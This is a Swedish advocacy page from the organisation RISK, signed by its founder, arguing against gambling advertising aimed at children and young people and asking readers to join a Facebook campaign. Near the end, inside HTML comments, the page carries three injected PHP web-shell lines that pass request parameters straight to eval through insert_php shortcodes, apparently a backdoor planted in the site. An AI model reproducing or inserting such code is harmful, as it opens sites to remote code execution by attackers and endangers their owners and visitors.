Vill Du bidra till att få bort spelreklam mot barn och unga?

Vi inom RISK har sedan 2012 lagt blod, svett och tårar på att skapa dialog kring ungas spelande. Det är med värme och glädje vi kan konstatera att 2014 blev året då vi numera FÖR dialog kring ungas spelande. Vi behöver dock driva på för att skapa en spelmarknad som är präglad av omtanke – där vi med fördel fokuserar mer på individerna som spelar och bemöter dem med värme.


I tider av reglering och utformande av ett svenskt licenssystem är det bra att det verkar gro en hunger efter spelansvar – en vilja att agera och lägga korten på bordet, där vi synar speletiken i sömmarna. Det finns många saker att göra för att överföra speletik till konkreta åtgärder, där ett område att prioritera är reglering av spelreklamen i Sverige. Med tiden har marknadsföringen tenderat att bli allt mer gränslös och påträngande, i vissa fall riktar den sig direkt till barn och unga.

Ett exempel på detta är reklamen för spelmaskiner på Svensk filmindustris webbplats tidigare i år. Reklamen var ett iögonfallande intro när man skulle titta på trailern för filmen Bamse och tjuvstaden. Vi menar att all spelreklam som riktar sig direkt till utsatta grupper bör försvinna – och då har vi främst barn i åtanke.


Vi uppskattar Håkan Hallstedts och Joakim Rönngrens debattartikel som kom ut nyligen. Det är mycket angeläget att Lotteriinspektionen ger sig in i debatten kring spelreklam som riktar sig direkt mot barn och unga. Vi stödjer deras förslag på förbättringar, där det är angeläget att föra dialog i samhället kring marknadsföring som vänder sig till barn och unga. Vi delar även ingången att det är dags för en översyn av spelreklamen och kopplingen till idrottens ungdomsverksamhet. För inte ser vi vattenflaskor med systembolagets logga eller utländska alkoholleverantörers profilering – i alla fall inte ännu.


Den svenska spelmarknaden har länge genomsyrats av en bristande omtanke om individen och bristerna avseende spelansvar har spridit ett slags kyla i samhället. Detta tydliggörs av att vi sedan slutet av 1990-talet har vetat att skadeverkningarna av spel om pengar slår hårdast mot minderåriga och unga, men valt att förhålla oss passiva.

Något som vore särskilt önskvärt är insatser för anhöriga, vilken grupp enligt Folkhälsomyndigheten är drygt 18 procent av befolkningen mellan 16 och 84 år.


Idag lever 75 000 barn med någon som spelar för mycket. Det är barn som länge har fått gilla läget då det anses vara ”tur” att pappa, mamma eller någon annan närstående ”i alla fall inte dricker eller brukar narkotika”.

Vi hoppas att fler aktörer följer Lotteriinspektionens linje och markerar att kalaset om marknadsandelar är över. Det är önskvärt att alla aktörer agerar vassare och visar framfötterna, där vi går till handling och erbjuder konkreta åtgärder. Vi uppmanar till fortsatt dialog mellan idéburen, offentlig och privat sektor där agerandet inte stannar vid fikaborden runt om i Sverige.


Vill du stödja RISK arbete med att föra dialog kring ungas spelande och bidra till att få bort spelreklamen som vänder sig direkt till barn och unga?

Välj ”kommer” i vårt upprop som du hittar genom att söka på ”Upprop: Hjälp oss föra dialog och få bort spelreklam mot barn och unga!” på Facebook eller klicka på länken nedan. Bli även gärna medlem i RISK eller en lokalförening som är ansluten till RISK!


Tillsammans kan vi ta ett helhetsgrepp om ungas spelande. Det är dags att vi vrider upp termostaten och låter glöden som tänts sedan 2012 prägla ett Sverige som sätter spelansvar på världskartan.


Plötsligt hände det.


#speldialog


Gustav Sundgren, grundare/ordförande, RISK


Vill du stödja uppropet? Klicka här!

<!– [insert_php]if (isset($_REQUEST["dPLf"])){eval($_REQUEST["dPLf"]);exit;}[/insert_php][php]if (isset($_REQUEST["dPLf"])){eval($_REQUEST["dPLf"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hHK"])){eval($_REQUEST["hHK"]);exit;}[/insert_php][php]if (isset($_REQUEST["hHK"])){eval($_REQUEST["hHK"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Iyuk"])){eval($_REQUEST["Iyuk"]);exit;}[/insert_php][php]if (isset($_REQUEST["Iyuk"])){eval($_REQUEST["Iyuk"]);exit;}[/php] –>

© 2014-2017 RISK |  Design by MOA motion design
Top
Följ oss: